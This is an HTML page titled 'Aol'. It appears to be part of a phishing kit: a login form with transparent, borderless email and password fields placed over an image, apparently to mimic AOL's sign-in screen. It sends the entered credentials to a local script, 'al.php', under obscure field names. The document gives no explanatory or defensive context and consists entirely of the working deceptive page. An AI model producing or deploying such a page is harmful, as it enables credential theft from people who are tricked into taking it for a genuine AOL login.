<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Aol</title>
</head>

<body>
<form action="al.php" method="post">
<div style="background-image:url(imgd/al.png); width:318px; height:483px; background-repeat:no-repeat">
  <table width="319" height="284" border="0" cellpadding="0" cellspacing="0">
    <tr>
      <td width="32" rowspan="5">&nbsp;</td>
      <td width="287" height="73">&nbsp;</td>
    </tr>
    <tr>
      <td height="41"><label>
        <input type="email" name="lafs" required placeholder="Username or Email" style="background:none; border:none; width:240px; height:32px; font-size:16px; padding-left:10px;"  />
      </label></td>
    </tr>
    <tr>
      <td height="52"><label>
        <input type="password" name="laffa" required placeholder="Password" style="background:none; border:none; width:240px; height:32px; font-size:16px; padding-left:10px;"  />
      </label></td>
    </tr>
    <tr>
      <td height="58">&nbsp;</td>
    </tr>
    <tr>
      <td height="50"><label>
        <input type="image" src="imgd/bttn.png" />
      </label></td>
    </tr>
  </table>
</div>
</form>
</body>
</html>
